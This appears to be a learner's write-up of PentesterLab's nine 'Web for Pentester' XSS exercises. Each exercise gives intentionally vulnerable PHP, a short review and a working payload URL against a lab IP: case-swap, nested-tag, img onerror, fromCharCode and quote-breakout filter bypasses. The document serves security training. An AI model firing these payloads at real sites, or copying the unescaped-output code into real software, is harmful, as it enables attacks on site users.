PentesterLab -- Web for Pentester - XSS

Web for Pentester: This exercise is a set of the most common web vulnerabilities

Difficluty: 1/5

Example1

code review:

example1.php

<?php require_once '../header.php'; ?>
<html>
Hello 
<?php
  echo $_GET["name"];
?>

<?php require_once '../footer.php'; ?>

The vulnerability is due to no validaton of name.

exploit:

http://192.168.79.162/xss/example1.php?name=<script>alert("xss")</script>

Example2

code review:

example2.php

<?php require_once '../header.php'; ?>
Hello 
<?php
  
  $name =  $_GET["name"];
  $name = preg_replace("/<script>/","", $name);
  $name = preg_replace("/<\/script>/","", $name);
echo $name;
?>
<?php require_once '../footer.php'; ?>

In the above code, the developer filter <script> and </script>. However, I can use <Script>alert('xss')</Script> to bypass it.

exploit:

http://192.168.79.162/xss/example2.php?name=<Script>alert("xss")</Script>

Example 3

code review:

example3.php

<?php require_once '../header.php'; ?>
Hello 
<?php
  
  $name =  $_GET["name"];
  $name = preg_replace("/<script>/i","", $name);
  $name = preg_replace("/<\/script>/i","", $name);
echo $name;
?>

<?php require_once '../footer.php'; ?>

The developer tris to filter both lower case and upper case letter. I can use recursion method bypass this.

exploit:

http://192.168.79.162/xss/example3.php?name=<scr<script>ipt>alert("xss")</scr</script>ipt>

Example 4

code review:

example4.php

<?php require_once '../header.php';

if (preg_match('/script/i', $_GET["name"])) {
  die("error");
}
?>

Hello <?php  echo $_GET["name"]; ?>
<?php require_once '../footer.php'; ?>    

The developer tris to completely filter script. I can use img to bypass it.

exploit:

http://192.168.79.162/xss/example4.php?name=<img src="xx" onerror="alert('xss')"/>

Example5

code review:

example5.php

<?php require_once '../header.php';

if (preg_match('/alert/i', $_GET["name"])) {
  die("error");
}
?>

Hello <?php  echo $_GET["name"]; ?>
<?php require_once '../footer.php'; ?>    

The devekoper filter alert. I can use fromCharCode to build alert payload.

exploit:

http://192.168.79.162/xss/example5.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>

Example 6

code review:

example6.php

<?php require_once '../header.php'; ?>
Hello 
<script>
  var $a= "<?php  echo $_GET["name"]; ?>";
</script>
  <?php require_once '../footer.php'; ?>

The input name variable is between <script>, so we can just close the double quote and use \\ to comment the reset of code.

exploit:

http://192.168.79.162/xss/example6.php?name=";alert("xss");//

Example 7

code review

example7.php

<?php require_once '../header.php'; ?>
Hello 
<script>
  var $a= '<?php  echo htmlentities($_GET["name"]); ?>';
</script>
  
<?php require_once '../footer.php'; ?>

The developer uses htmlentities() to encode special characters. However, it does not encode single quotes ', so that I can use single quote to close it and comment the rest of the code

exploit:

http://192.168.79.162/xss/example7.php?name=';alert('xss');//

Example 8

code review

example8.php

<?php
  require_once '../header.php';

  if (isset($_POST["name"])) {
    echo "HELLO ".htmlentities($_POST["name"]);
  }
?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="POST">
  Your name:<input type="text" name="name" />
  <input type="submit" name="submit"/>

<?php

  require_once '../footer.php';

?>

The developer does not valid the parpmeter PHP_SELF so that I can bypass it.

exploit:

http://192.168.79.162/xss/example8.php/" onmouseover="alert('xss')

Example 9

code review

example9.php

<?php require_once '../header.php'; ?>
<script>
  document.write(location.hash.substring(1));
</script>
<?php require_once '../footer.php'; ?>

The user input is after #. This is a DOM-based XSS vuln.

exploit:

http://192.168.79.162/xss/example9.php#<script>alert(1)</script>

Bob1Bob2

Pen Test Notes